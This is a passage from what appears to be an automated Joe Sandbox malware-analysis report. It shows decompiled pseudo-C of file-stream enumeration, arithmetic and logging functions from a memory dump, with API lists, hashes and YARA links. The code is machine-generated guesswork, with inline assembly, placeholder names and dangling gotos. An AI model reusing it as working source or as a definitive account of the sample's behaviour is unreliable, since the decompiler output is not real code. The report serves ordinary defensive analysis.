												E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t256,  *((intOrPtr*)(_t452 - 0x68))),  *((intOrPtr*)(_t452 - 0x74))),  *((intOrPtr*)(_t452 - 0x20))),  *((intOrPtr*)(_t452 - 0x40))),  *((intOrPtr*)(_t452 - 0x58))),  *((intOrPtr*)(_t452 - 0x34)));
												_t302 =  *(_t452 - 0x14);
												 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
												__eflags = _t302;
												if(_t302 != 0) {
													 *((intOrPtr*)( *_t302 + 8))(_t302);
												}
												_t238 = 0;
												goto L64;
											}
											__eflags =  *(_t452 - 0xd);
											if( *(_t452 - 0xd) != 0) {
												goto L60;
											}
											goto L50;
										} else {
											E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t292,  *((intOrPtr*)(_t452 - 0x68))),  *((intOrPtr*)(_t452 - 0x74))),  *((intOrPtr*)(_t452 - 0x20))),  *((intOrPtr*)(_t452 - 0x40))),  *((intOrPtr*)(_t452 - 0x58))),  *((intOrPtr*)(_t452 - 0x34)));
											L57:
											_t313 =  *(_t452 - 0x14);
											 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
											__eflags = _t313;
											if(_t313 != 0) {
												 *((intOrPtr*)( *_t313 + 8))(_t313);
											}
											_t238 = _t357;
											goto L64;
										}
									} else {
										E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t282,  *((intOrPtr*)(_t452 - 0x68))),  *((intOrPtr*)(_t452 - 0x74))),  *((intOrPtr*)(_t452 - 0x20))),  *((intOrPtr*)(_t452 - 0x40))),  *((intOrPtr*)(_t452 - 0x58))),  *((intOrPtr*)(_t452 - 0x34)));
										_t342 =  *(_t452 - 0x14);
										 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
										__eflags = _t342;
										if(_t342 != 0) {
											 *((intOrPtr*)( *_t342 + 8))(_t342);
										}
										_t238 = _t447;
										goto L64;
									}
								}
								_t418 =  *((intOrPtr*)(_t452 - 0x20)) + _t256 * 2 - 6;
								while(1) {
									__eflags =  *_t418 - 0x30;
									if( *_t418 != 0x30) {
										goto L22;
									}
									_t446 = _t446 + 1;
									_t418 = _t418 - _t354;
									__eflags = _t446 - _t256;
									if(_t446 < _t256) {
										continue;
									}
									goto L22;
								}
								goto L22;
							}
							_t256 = E003B23AC( *((intOrPtr*)(_t452 - 0x20)) +  *(_t452 - 0x1c) * 2 - 4, 0x42e848);
							__eflags = _t256;
							if(_t256 == 0) {
								goto L60;
							}
							goto L18;
						}
						_t256 =  *(_t452 - 0x1c);
						 *(_t452 - 0xd) = 1;
						__eflags = _t256 - _t354;
						if(_t256 <= _t354) {
							goto L23;
						}
						_t422 =  *((intOrPtr*)(_t452 - 0x20)) + _t256 * 2 - 6;
						while(1) {
							__eflags =  *_t422 - 0x61;
							if( *_t422 != 0x61) {
								goto L23;
							}
							_t446 = _t446 + 1;
							_t422 = _t422 - _t354;
							__eflags = _t446 - _t256;
							if(_t446 < _t256) {
								continue;
							}
							goto L23;
						}
						goto L23;
					}
					E003B1E40(E003B92C9(_t452 - 0x8c),  *((intOrPtr*)(_t452 - 0x34)));
					_t263 =  *(_t452 - 0x14);
					 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
					__eflags = _t263;
					goto L61;
				}
				E003B1E40(E003B92C9(_t452 - 0x8c),  *((intOrPtr*)(_t452 - 0x34)));
				_t350 =  *(_t452 - 0x14);
				 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
				if(_t350 != 0) {
					 *((intOrPtr*)( *_t350 + 8))(_t350);
				}
				_t238 =  *(_t452 - 0x24);
				goto L64;
			}








































                                                                                                    0x003f0b58
                                                                                                    0x003f0b65
                                                                                                    0x003f0b68
                                                                                                    0x003f0b6b
                                                                                                    0x003f0b6e
                                                                                                    0x003f0b75
                                                                                                    0x003f1111
                                                                                                    0x003f1113
                                                                                                    0x003f1114
                                                                                                    0x003f111a
                                                                                                    0x003f1122
                                                                                                    0x003f1122
                                                                                                    0x003f0b7b
                                                                                                    0x003f0b8a
                                                                                                    0x003f0b8d
                                                                                                    0x003f0b92
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0b9b
                                                                                                    0x003f0ba0
                                                                                                    0x003f0ba7
                                                                                                    0x003f0bae
                                                                                                    0x003f0bb4
                                                                                                    0x003f0bb9
                                                                                                    0x003f0bc6
                                                                                                    0x003f0bc9
                                                                                                    0x003f0bce
                                                                                                    0x003f0bd1
                                                                                                    0x003f0c00
                                                                                                    0x003f0c08
                                                                                                    0x003f0c35
                                                                                                    0x003f0c40
                                                                                                    0x003f0c44
                                                                                                    0x003f0c53
                                                                                                    0x003f0c5e
                                                                                                    0x003f0c69
                                                                                                    0x003f0c71
                                                                                                    0x003f0c7d
                                                                                                    0x003f0c81
                                                                                                    0x003f0c89
                                                                                                    0x003f0c8d
                                                                                                    0x003f0c95
                                                                                                    0x003f0c9d
                                                                                                    0x003f0ca1
                                                                                                    0x003f0ca6
                                                                                                    0x003f0ca9
                                                                                                    0x003f0cad
                                                                                                    0x003f0caf
                                                                                                    0x003f0cb3
                                                                                                    0x003f0cb5
                                                                                                    0x003f10cd
                                                                                                    0x003f10f8
                                                                                                    0x003f10fd
                                                                                                    0x003f1100
                                                                                                    0x003f1107
                                                                                                    0x003f1109
                                                                                                    0x003f1109
                                                                                                    0x003f110e
                                                                                                    0x003f110e
                                                                                                    0x00000000
                                                                                                    0x003f1109
                                                                                                    0x003f0cc7
                                                                                                    0x003f0ccc
                                                                                                    0x003f0cce
                                                                                                    0x003f0cf1
                                                                                                    0x003f0cf4
                                                                                                    0x003f0cf6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0d08
                                                                                                    0x003f0d0d
                                                                                                    0x003f0d0f
                                                                                                    0x003f0d2d
                                                                                                    0x003f0d2d
                                                                                                    0x003f0d30
                                                                                                    0x003f0d32
                                                                                                    0x003f0d48
                                                                                                    0x003f0d48
                                                                                                    0x003f0d4a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0d50
                                                                                                    0x003f0d5d
                                                                                                    0x003f0d69
                                                                                                    0x003f0d6d
                                                                                                    0x003f0d76
                                                                                                    0x003f0d82
                                                                                                    0x003f0d8d
                                                                                                    0x003f0d91
                                                                                                    0x003f0da7
                                                                                                    0x003f0daf
                                                                                                    0x003f0db2
                                                                                                    0x003f0db5
                                                                                                    0x003f0db8
                                                                                                    0x003f0dc9
                                                                                                    0x003f0dd1
                                                                                                    0x003f0dba
                                                                                                    0x003f0dc2
                                                                                                    0x003f0dc2
                                                                                                    0x003f0dd6
                                                                                                    0x003f0de3
                                                                                                    0x003f0de5
                                                                                                    0x003f0de7
                                                                                                    0x003f0e34
                                                                                                    0x003f0e3a
                                                                                                    0x003f0e3d
                                                                                                    0x003f0e40
                                                                                                    0x003f0e43
                                                                                                    0x003f0e46
                                                                                                    0x003f0e4b
                                                                                                    0x003f0e50
                                                                                                    0x003f0e56
                                                                                                    0x003f0e5b
                                                                                                    0x003f0e5e
                                                                                                    0x003f0e61
                                                                                                    0x003f0e63
                                                                                                    0x003f0e69
                                                                                                    0x003f0e6d
                                                                                                    0x003f0e72
                                                                                                    0x003f0e72
                                                                                                    0x003f0e78
                                                                                                    0x003f0e7e
                                                                                                    0x003f0e89
                                                                                                    0x003f0e8e
                                                                                                    0x003f0e91
                                                                                                    0x003f0e95
                                                                                                    0x003f0e97
                                                                                                    0x003f0e9c
                                                                                                    0x003f0e9c
                                                                                                    0x003f0ea2
                                                                                                    0x003f0ea6
                                                                                                    0x003f0ea9
                                                                                                    0x003f0eb8
                                                                                                    0x003f0eba
                                                                                                    0x003f0ebc
                                                                                                    0x003f0ef9
                                                                                                    0x003f0efe
                                                                                                    0x003f0f04
                                                                                                    0x003f0f05
                                                                                                    0x003f0f09
                                                                                                    0x003f0f0e
                                                                                                    0x003f0f10
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0f16
                                                                                                    0x003f0f1a
                                                                                                    0x003f0f21
                                                                                                    0x003f0f2e
                                                                                                    0x003f0f30
                                                                                                    0x003f0f33
                                                                                                    0x003f0ff7
                                                                                                    0x003f0ffa
                                                                                                    0x003f0ffe
                                                                                                    0x003f1000
                                                                                                    0x003f1005
                                                                                                    0x003f1005
                                                                                                    0x00000000
                                                                                                    0x003f1000
                                                                                                    0x003f0f39
                                                                                                    0x003f0f3b
                                                                                                    0x003f106c
                                                                                                    0x003f106c
                                                                                                    0x003f106f
                                                                                                    0x003f1073
                                                                                                    0x003f1073
                                                                                                    0x003f1075
                                                                                                    0x003f107a
                                                                                                    0x003f107a
                                                                                                    0x003f10b0
                                                                                                    0x00000000
                                                                                                    0x003f10b5
                                                                                                    0x003f0f41
                                                                                                    0x003f0f44
                                                                                                    0x003f0f46
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0f54
                                                                                                    0x003f0f56
                                                                                                    0x003f0f58
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0f5e
                                                                                                    0x003f0f64
                                                                                                    0x003f0f67
                                                                                                    0x003f0f6c
                                                                                                    0x003f0f71
                                                                                                    0x003f0f76
                                                                                                    0x003f0f7f
                                                                                                    0x003f0f82
                                                                                                    0x003f0f84
                                                                                                    0x003f0f8a
                                                                                                    0x003f0f90
                                                                                                    0x003f0f9b
                                                                                                    0x003f0fa3
                                                                                                    0x003f0faa
                                                                                                    0x003f0fb0
                                                                                                    0x003f0fc2
                                                                                                    0x003f0fc4
                                                                                                    0x003f0fc7
                                                                                                    0x003f0fc9
                                                                                                    0x003f0fcd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0fd3
                                                                                                    0x003f0fd5
                                                                                                    0x003f0fda
                                                                                                    0x003f0fda
                                                                                                    0x003f0fe0
                                                                                                    0x003f0fe4
                                                                                                    0x003f0fed
                                                                                                    0x003f0fed
                                                                                                    0x003f100b
                                                                                                    0x003f1010
                                                                                                    0x003f1015
                                                                                                    0x003f1021
                                                                                                    0x003f104c
                                                                                                    0x003f1051
                                                                                                    0x003f1054
                                                                                                    0x003f105b
                                                                                                    0x003f105d
                                                                                                    0x003f1062
                                                                                                    0x003f1062
                                                                                                    0x003f1065
                                                                                                    0x00000000
                                                                                                    0x003f1065
                                                                                                    0x003f1017
                                                                                                    0x003f101b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0ebe
                                                                                                    0x003f0ee9
                                                                                                    0x003f10b8
                                                                                                    0x003f10b8
                                                                                                    0x003f10bb
                                                                                                    0x003f10bf
                                                                                                    0x003f10c1
                                                                                                    0x003f10c6
                                                                                                    0x003f10c6
                                                                                                    0x003f10c9
                                                                                                    0x00000000
                                                                                                    0x003f10c9
                                                                                                    0x003f0de9
                                                                                                    0x003f0e14
                                                                                                    0x003f0e19
                                                                                                    0x003f0e1c
                                                                                                    0x003f0e23
                                                                                                    0x003f0e25
                                                                                                    0x003f0e2a
                                                                                                    0x003f0e2a
                                                                                                    0x003f0e2d
                                                                                                    0x00000000
                                                                                                    0x003f0e2d
                                                                                                    0x003f0de7
                                                                                                    0x003f0d37
                                                                                                    0x003f0d3b
                                                                                                    0x003f0d3b
                                                                                                    0x003f0d3f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0d41
                                                                                                    0x003f0d42
                                                                                                    0x003f0d44
                                                                                                    0x003f0d46
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0d46
                                                                                                    0x00000000
                                                                                                    0x003f0d3b
                                                                                                    0x003f0d20
                                                                                                    0x003f0d25
                                                                                                    0x003f0d27
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0d27
                                                                                                    0x003f0cd0
                                                                                                    0x003f0cd3
                                                                                                    0x003f0cd7
                                                                                                    0x003f0cd9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0cde
                                                                                                    0x003f0ce2
                                                                                                    0x003f0ce2
                                                                                                    0x003f0ce6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0ce8
                                                                                                    0x003f0ce9
                                                                                                    0x003f0ceb
                                                                                                    0x003f0ced
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f0cef
                                                                                                    0x00000000
                                                                                                    0x003f0ce2
                                                                                                    0x003f0c18
                                                                                                    0x003f0c1d
                                                                                                    0x003f0c20
                                                                                                    0x003f0c25
                                                                                                    0x00000000
                                                                                                    0x003f0c25
                                                                                                    0x003f0be1
                                                                                                    0x003f0be6
                                                                                                    0x003f0be9
                                                                                                    0x003f0bf0
                                                                                                    0x003f0bf5
                                                                                                    0x003f0bf5
                                                                                                    0x003f0bf8
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F0B58
                                                                                                      • Part of subcall function 003B92C9: VariantClear.OLEAUT32(?), ref: 003B92EB
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearH_prologVariantfree
                                                                                                    • String ID: HB$LB$PB$file
                                                                                                    • API String ID: 904627215-1030411930
                                                                                                    • Opcode ID: 320c64c3aa2e360a9a0336e6ff5e1f4583e1880180dbdfbd87a9d0bd892ee112
                                                                                                    • Instruction ID: e61904b340440f0483ff7b99c5c3eb4ad30918b3e85cef830a4e49ebe16ba036
                                                                                                    • Opcode Fuzzy Hash: 320c64c3aa2e360a9a0336e6ff5e1f4583e1880180dbdfbd87a9d0bd892ee112
                                                                                                    • Instruction Fuzzy Hash: B212803090024DDFCF16EFE4C995AEEBBB6BF44344F204169E605AB662DB31AE45DB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BCE49 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003BCE49(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t35;
				intOrPtr _t39;
				signed int _t42;
				void* _t54;
				void* _t57;
				void* _t59;

				_t42 = __edx;
				_t49 = E0041F380(_a12, _a16, 0x64, 0);
				_t46 = _t42;
				_a16 = E0041F3F0(_a12, _a16, 0x64, 0);
				_v12 = 0;
				_v8 = 0;
				_t39 = _a8;
				if((_t26 | _t42) == 0) {
					L5:
					if(_a16 == 0) {
						L15:
						_t30 = _v12;
					} else {
						_t31 = E0041F380(0xffffffff, 0xffffffff, _a16, 0);
						_t57 = _t39 - _t42;
						if(_t57 > 0 || _t57 >= 0 && _a4 > _t31) {
							_t33 = E0041F4B0(E0041F380(_a4, _t39, 0x64, 0), _t42, _a16, 0);
						} else {
							_t33 = E0041F380(E0041F4B0(_a16, 0, _a4, _t39), _t42, 0x64, 0);
						}
						_v12 = _v12 + _t33;
						asm("adc [ebp-0x4], edx");
						_t59 = _v8 - _t42;
						if(_t59 > 0 || _t59 >= 0 && _v12 >= _t33) {
							goto L15;
						} else {
							goto L14;
						}
					}
				} else {
					_t35 = E0041F380(0xffffffff, 0xffffffff, _t49, _t46);
					_t54 = _t39 - _t42;
					if(_t54 < 0 || _t54 <= 0 && _a4 <= _t35) {
						_v12 = E0041F4B0(_t49, _t46, _a4, _t39);
						_v8 = _t42;
						goto L5;
					} else {
						L14:
						_t30 = _t42 | 0xffffffff;
					}
				}
				return _t30;
			}














                                                                                                    0x003bce49
                                                                                                    0x003bce61
                                                                                                    0x003bce63
                                                                                                    0x003bce73
                                                                                                    0x003bce78
                                                                                                    0x003bce7b
                                                                                                    0x003bce7e
                                                                                                    0x003bce83
                                                                                                    0x003bceac
                                                                                                    0x003bceb1
                                                                                                    0x003bcf14
                                                                                                    0x003bcf14
                                                                                                    0x003bceb3
                                                                                                    0x003bcebb
                                                                                                    0x003bcec0
                                                                                                    0x003bcec2
                                                                                                    0x003bcef6
                                                                                                    0x003bcecb
                                                                                                    0x003bcedd
                                                                                                    0x003bcedd
                                                                                                    0x003bcefb
                                                                                                    0x003bcefe
                                                                                                    0x003bcf01
                                                                                                    0x003bcf04
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003bcf04
                                                                                                    0x003bce85
                                                                                                    0x003bce8b
                                                                                                    0x003bce90
                                                                                                    0x003bce92
                                                                                                    0x003bcea6
                                                                                                    0x003bcea9
                                                                                                    0x00000000
                                                                                                    0x003bcf0d
                                                                                                    0x003bcf0d
                                                                                                    0x003bcf10
                                                                                                    0x003bcf10
                                                                                                    0x003bce92
                                                                                                    0x003bcf1e

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldiv$__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2022606265-0
                                                                                                    • Opcode ID: 773ee1e0ecc490bd4e6428b53f492a823e48f7a3e03fa278e780533b4820a32c
                                                                                                    • Instruction ID: 5fc865e5bc51d432193512afc99d8f517202dcd6cc6af5c5de65cea5c8f46d73
                                                                                                    • Opcode Fuzzy Hash: 773ee1e0ecc490bd4e6428b53f492a823e48f7a3e03fa278e780533b4820a32c
                                                                                                    • Instruction Fuzzy Hash: 6521D57191021DFFDF319F958C40CEFBE6AEF457A9F20822AFA24A1091D2758D90D7A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B6763 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E003B6763(intOrPtr* __ecx, void* __eflags) {
				long _t21;
				signed int _t25;
				void* _t34;
				intOrPtr* _t48;
				void* _t50;
				intOrPtr _t57;

				E0041F1B0(E00422F40, _t50);
				_t48 = __ecx;
				if(E003B6533(__ecx) == 0) {
					L12:
					_t21 = 0;
				} else {
					_t57 =  *0x43a5cc; // 0x775d42f0
					if(_t57 != 0) {
						SetLastError(0);
						_t34 = E003B8717( *((intOrPtr*)(_t50 + 8)));
						if(_t34 != 1) {
							_t2 = _t50 - 0x270; // -624
							 *_t48 =  *0x43a5cc( *((intOrPtr*)(_t50 + 8)), 0, _t2, 0);
						}
						if( *_t48 != 0xffffffff) {
							L13:
							_t16 = _t50 - 0x270; // -624
							E003B6846(_t16,  *((intOrPtr*)(_t50 + 0xc)));
							_t21 = 1;
						} else {
							if(GetLastError() == 0x26) {
								goto L12;
							} else {
								if(_t34 != 0) {
									_t4 = _t50 - 0x18; // -24
									_t25 = E003B2D47(_t4);
									_t8 = _t50 - 0x18; // -24
									 *(_t50 - 4) = 0;
									if(E003B8820( *((intOrPtr*)(_t50 + 8)), _t8, _t50, _t25 & 0xffffff00 | _t34 != 0x00000001) != 0) {
										_t10 = _t50 - 0x270; // -624
										 *_t48 =  *0x43a5cc( *((intOrPtr*)(_t50 - 0x18)), 0, _t10, 0);
									}
									 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
									E003B1E40(_t27,  *((intOrPtr*)(_t50 - 0x18)));
								}
								if( *_t48 != 0xffffffff) {
									goto L13;
								} else {
									goto L12;
								}
							}
						}
					} else {
						SetLastError(0x78);
						goto L12;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t21;
			}









                                                                                                    0x003b6768
                                                                                                    0x003b6776
                                                                                                    0x003b677f
                                                                                                    0x003b6821
                                                                                                    0x003b6821
                                                                                                    0x003b6785
                                                                                                    0x003b6787
                                                                                                    0x003b678d
                                                                                                    0x003b679d
                                                                                                    0x003b67ab
                                                                                                    0x003b67b0
                                                                                                    0x003b67b2
                                                                                                    0x003b67c4
                                                                                                    0x003b67c4
                                                                                                    0x003b67c9
                                                                                                    0x003b6825
                                                                                                    0x003b6828
                                                                                                    0x003b682e
                                                                                                    0x003b6833
                                                                                                    0x003b67cb
                                                                                                    0x003b67d4
                                                                                                    0x00000000
                                                                                                    0x003b67d6
                                                                                                    0x003b67d8
                                                                                                    0x003b67da
                                                                                                    0x003b67dd
                                                                                                    0x003b67ec
                                                                                                    0x003b67ef
                                                                                                    0x003b67f9
                                                                                                    0x003b67fb
                                                                                                    0x003b680d
                                                                                                    0x003b680d
                                                                                                    0x003b6812
                                                                                                    0x003b6816
                                                                                                    0x003b681b
                                                                                                    0x003b681f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b681f
                                                                                                    0x003b67d4
                                                                                                    0x003b678f
                                                                                                    0x003b6791
                                                                                                    0x00000000
                                                                                                    0x003b6791
                                                                                                    0x003b678d
                                                                                                    0x003b683b
                                                                                                    0x003b6843

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B6768
                                                                                                      • Part of subcall function 003B6533: FindClose.KERNELBASE(00000000,?,003B656B), ref: 003B653E
                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,?), ref: 003B6791
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,?), ref: 003B679D
                                                                                                    • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 003B67BE
                                                                                                    • GetLastError.KERNEL32(?,?), ref: 003B67CB
                                                                                                    • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 003B6807
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFindLast$FirstStream$CloseH_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 1050961465-0
                                                                                                    • Opcode ID: 9c003dfe08d68dbc8c70de17b1d555069176ebcdaaf4035d078529132794382e
                                                                                                    • Instruction ID: 01053e6a718785e4ed3bd4107a206a11702ed3fcbb2c8f7508f1b0a3a5c5bf15
                                                                                                    • Opcode Fuzzy Hash: 9c003dfe08d68dbc8c70de17b1d555069176ebcdaaf4035d078529132794382e
                                                                                                    • Instruction Fuzzy Hash: 1E21DA31900105EBCB26AF60DC8A8FE7B75FF81718F104229EA9596991CB354D86DF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4C86 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E003E4C86(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v16;
				void* __ebp;
				void* _t33;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t69;

				EnterCriticalSection(0x43a878);
				if(_a8 != 0) {
					_t67 = _a4;
					 *((intOrPtr*)(_t67 + 0x158)) =  *((intOrPtr*)(_t67 + 0x158)) + 1;
					asm("adc [eax+0x4], ebx");
					 *((intOrPtr*)(_t67 + 0x150)) =  *((intOrPtr*)(_t67 + 0x150)) + 1;
					asm("adc [eax+0x4], ebx");
					if( *(_t67 + 0xcc) != 0) {
						E003E480A(_t67);
						E003B2690( &_v16);
						E003E4BAC(_a8, _a12, _t69,  &_v16);
						fputs(_v16,  *( *(_t67 + 0xcc)));
						if( *((intOrPtr*)(_t67 + 0x108)) != 0) {
							fputs(" : ",  *( *(_t67 + 0xcc)));
							E003B210C(_t67 + 0x104);
						}
						E003B1FA0( *(_t67 + 0xcc));
						E003B1E40(L003B1F91( *(_t67 + 0xcc)), _v16);
					}
				} else {
					_t48 = _a4;
					if( *((intOrPtr*)(_t48 + 0xbc)) != 0) {
						 *((intOrPtr*)(_t48 + 0x34)) = 0;
						 *((char*)( *((intOrPtr*)(_t48 + 0x30)))) = 0;
						 *((intOrPtr*)(_t48 + 0x40)) = 0;
						 *((short*)( *((intOrPtr*)(_t48 + 0x3c)))) = 0;
						 *((intOrPtr*)(_t48 + 0x28)) =  *((intOrPtr*)(_t48 + 0x28)) + 1;
						asm("adc [eax+0x2c], ebx");
					}
				}
				_t33 = E003E571F();
				LeaveCriticalSection(0x43a878);
				return _t33;
			}









                                                                                                    0x003e4c93
                                                                                                    0x003e4c9e
                                                                                                    0x003e4ccc
                                                                                                    0x003e4ccf
                                                                                                    0x003e4cdc
                                                                                                    0x003e4cdf
                                                                                                    0x003e4cec
                                                                                                    0x003e4cf5
                                                                                                    0x003e4cfa
                                                                                                    0x003e4d02
                                                                                                    0x003e4d11
                                                                                                    0x003e4d27
                                                                                                    0x003e4d31
                                                                                                    0x003e4d40
                                                                                                    0x003e4d51
                                                                                                    0x003e4d51
                                                                                                    0x003e4d5c
                                                                                                    0x003e4d6f
                                                                                                    0x003e4d75
                                                                                                    0x003e4ca0
                                                                                                    0x003e4ca0
                                                                                                    0x003e4ca9
                                                                                                    0x003e4cb2
                                                                                                    0x003e4cb5
                                                                                                    0x003e4cba
                                                                                                    0x003e4cbd
                                                                                                    0x003e4cc0
                                                                                                    0x003e4cc4
                                                                                                    0x003e4cc4
                                                                                                    0x003e4ca9
                                                                                                    0x003e4d76
                                                                                                    0x003e4d82
                                                                                                    0x003e4d8d

                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(0043A878), ref: 003E4C93
                                                                                                    • fputs.MSVCRT ref: 003E4D27
                                                                                                    • fputs.MSVCRT ref: 003E4D40
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A878), ref: 003E4D82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionfputs$EnterLeave
                                                                                                    • String ID: :
                                                                                                    • API String ID: 3346953513-3653984579
                                                                                                    • Opcode ID: c402dff46b1744b428a37e7a21829ab4f34ec416476a1a34c8e391d23fb18c85
                                                                                                    • Instruction ID: 15a356e66e524fe00dedbfa9e67715449b42e9abb3e069fac2d58121cb4a0c5d
                                                                                                    • Opcode Fuzzy Hash: c402dff46b1744b428a37e7a21829ab4f34ec416476a1a34c8e391d23fb18c85
                                                                                                    • Instruction Fuzzy Hash: 36317C31901614DFD716EFA5D884EDAB7B4FF88324F51866EE55A8B2A2DB30A800CF14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003EC100(void* __ecx, void* __edi) {
				void* _t47;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
